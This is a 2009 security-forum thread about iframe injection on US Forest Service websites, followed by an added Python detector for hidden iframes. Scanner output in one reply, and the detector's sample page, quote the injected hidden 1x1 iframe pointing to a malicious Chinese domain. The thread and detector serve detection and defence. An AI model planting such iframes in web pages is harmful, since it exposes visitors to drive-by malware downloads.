Author Topic: Iframe-inf infects the United States Forest Service???  (Read 5841 times)


Offline cowboythecat

Iframe-inf infects the United States Forest Service???
« on: April 14, 2009, 05:31:34 PM »
Hi, I have been getting a warning that the USFS websites (all of them) are infected with Iframe-inf.

A few have gone down and now have the "experiencing technical difficulties" generic message, which leads me to believe that it may be a real threat.

But linkscanner says they are safe.

Help???

Thanks.

Offline Lisandro

« Reply #1 on: April 14, 2009, 05:48:09 PM »
Generally, avast detection is accurate in these cases.
Isn't it an encrypted/obfuscated script or iframe?
Wasn't the site hacked?
The best things in life are free.

Offline cowboythecat

« Reply #2 on: April 14, 2009, 05:52:52 PM »
Quote
> Generally, avast detection is accurate in these cases.
> Isn't it an encrypted/obfuscated script or iframe?
> Wasn't the site hacked?

I'm sorry, but I don't understand what you mean...  Please use "internet for dummies" terminology when asking me stuff... :-[ :P

I am not aware of a known hack of the USFS.

Offline DavidR

« Reply #3 on: April 14, 2009, 05:59:10 PM »
Got a link?
Change the http to hXXP in the URL to ensure it isn't active, avoiding accidental exposure.

Given their message it is highly possible it has been infected.

This type of attack, iframe injection, is becoming more common and avast is all over it like a rash. Of all the ones I have investigated in the forums all have proved correct. However, today I have seen one that might be incorrect.

I have just checked this one out hXXp://www.fs.fed.us/ and it has most certainly been hacked, a hidden iframe pointing to a Chinese domain.

Note in the image the <h1 Forest Service Website Is Currently Unavailable /h1> (edited) now that could be part of the deception or them trying to clear up. But even the attempt to block, e.g. the unavailability page is infected.
WinXP ProSP3/ Core2Duo E8300/ 4GB Ram/ avast! free 18.5.2342/ Firefox ESR, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ DropMyRights/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security
Windows 10 Home 1909 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 20.6.2420 (build 20.6.5495.561) UI-1.0.544/ WinPatrol+/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro

Offline cowboythecat

« Reply #4 on: April 14, 2009, 06:05:08 PM »
Quote
> Got a link?
> Change the http to hXXP in the URL to ensure it isn't active, avoiding accidental exposure.
>
> Given their message it is highly possible it has been infected.
>
> This type of attack, iframe injection, is becoming more common and avast is all over it like a rash. Of all the ones I have investigated in the forums all have proved correct. However, today I have seen one that might be incorrect.
>
> I have just checked this one out hXXp://www.fs.fed.us/ and it has most certainly been hacked, a hidden iframe pointing to a Chinese domain.
>
> Note in the image the <h1 Forest Service Website Is Currently Unavailable /h1> (edited) now that could be part of the deception or them trying to clear up. But even the attempt to block, e.g. the unavailability page is infected.

I think the link you searched is as good as any...

I have checked multiple FS sites now and gotten the "website currently unavailable" page without a warning from avast... Does this mean I should be concerned that my computer is infected?

Running the most current version of the free program, and using the most current firefox browser.

Thanks for your replies.  Better let my coworkers who run other less-thorough antivirus programs know, I suppose. 8)

Offline cowboythecat

« Reply #5 on: April 14, 2009, 06:09:35 PM »
Sorry, here's a link to one of the "down" sites with an unavailable message

hxxp://www.fs.fed.us/r9/shawnee/

From viewing the source, it looks legit.

Offline DavidR

« Reply #6 on: April 14, 2009, 07:18:24 PM »
Those pages that you are getting the message without an avast alert, I can only assume have been cleaned but the site I guess won't be available until they resolve not only the removal of the injected iframes but how they got there and to close that vulnerability.

So without URLs for those you can view without alert there is no way to confirm that they have in fact been cleaned. Though there is more than enough evidence that they have been hacked. If as you say this spreads over multiple sites, though I only see links for the one fs.fed.us domain it could be an orchestrated attack.

Quote
> Sorry, here's a link to one of the "down" sites with an unavailable message
>
> hxxp://www.fs.fed.us/r9/shawnee/
>
> From viewing the source, it looks legit.

Your viewing of the source is different to mine as this too has most certainly been hacked (see image), with the same injection of a hidden iframe pointing to a Chinese domain...

So I don't see how you are able to see the page with the unavailable message, though that would also depend on your browser (?)

Offline polonus

« Reply #7 on: April 14, 2009, 07:37:19 PM »
Hi DavidR:

Here are the results of the Bad Stuff Detektor:
Total zeroiframes found: 1

Check took 6.95 seconds

(Level: 0) Url checked:
hxxp://www.fs.fed.us/
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://lotmachinesguide.cn/in.cgi?income56
Zeroiframes detected on this site: 0
No ad codes identified
Code:
<iframe src="hxxp://lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>

(Level: 2) Url checked: (iframe source)
hxxp://lotmachinesguide.cn/cache/readme.pdf
Blank page / could not connect
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://lotmachinesguide.cn/cache/flash.swf
Blank page / could not connect
No ad codes identified


polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
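
An added example (not from the thread, and not the code of any tool named in it): a minimal Python check for the pattern reported above, an iframe that is 1 pixel or smaller or hidden by CSS, run over saved page source. The `scan` function, the reason labels and the sample page are constructed for illustration; only the flagged iframe tag is copied from the post, already defanged.

```python
import re
from html.parser import HTMLParser

HIDDEN_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
CSS_SIZE = re.compile(r"(?<![-\w])(?:width|height)\s*:\s*([^;]+)", re.I)
PIXELS = re.compile(r"\s*(\d+(?:\.\d+)?)\s*(?:px)?\s*", re.I)

def defang(url):
    """Make a URL non-clickable for reporting (http -> hxxp)."""
    return re.sub(r"^http", "hxxp", url.strip(), flags=re.I)

def tiny(value):
    """True for a size of 0 or 1 pixel; missing values and percentages are not tiny."""
    m = PIXELS.fullmatch(value or "")
    return bool(m) and float(m.group(1)) <= 1

class IframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {name: (value or "") for name, value in attrs}
        style = a.get("style", "")
        reasons = []
        # Size can come from width/height attributes or from inline CSS.
        sizes = [a.get("width"), a.get("height")] + CSS_SIZE.findall(style)
        if any(tiny(s) for s in sizes):
            reasons.append("size<=1px")
        if HIDDEN_CSS.search(style):
            reasons.append("css-hidden")
        if reasons:
            self.findings.append((defang(a.get("src", "")), reasons))

def scan(html):
    """Return (defanged src, reasons) for every suspicious iframe in html."""
    finder = IframeFinder()
    finder.feed(html)
    return finder.findings

# Constructed sample page: one visible iframe, the tag from the post, one CSS-sized case.
SAMPLE = """<html><body><h1>Constructed test page</h1>
<iframe src="http://example.org/map" width="600" height="400"></iframe>
<iframe src="hxxp://lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://example.net/x" style="width:0; height:0"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in scan(SAMPLE):
        print(src, reasons)
```

A check like this only sees iframes present in the static source; frames written into the page by obfuscated script at load time need the rendered DOM instead.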

Offline scythe944

« Reply #8 on: April 15, 2009, 04:13:52 AM »
Quote
> I am not aware of a known hack of the USFS.

We found one on the US International Trade Commission site...
http://forum.avast.com/index.php?topic=43712

I think they were down for a little over a week after I notified them.

US government sites seem to be getting hit hard these days.
For generic computer (not avast) problems, you can also visit my forum for help: http://www.jacobytech.net/forum

Offline CharleyO

« Reply #9 on: April 15, 2009, 09:36:47 AM »
***

The website at ... www.fs.fed.us/r9/shawnee/ ... is currently down apparently to repair the infection.

See the image below. Click to enlarge.


***
Self-built desktop (8 years old) - AMD64 3200+_Gigabyte GA-K8NS Ultra-939_4 gb RAM_GeForceFX 5800w/256 ram_XP/SP3_Avast 7_MBAM_ZA Free __and__ Toshiba Satellite Laptop_W7-64bit_ 4 gb Ram_Avast 8_MBAM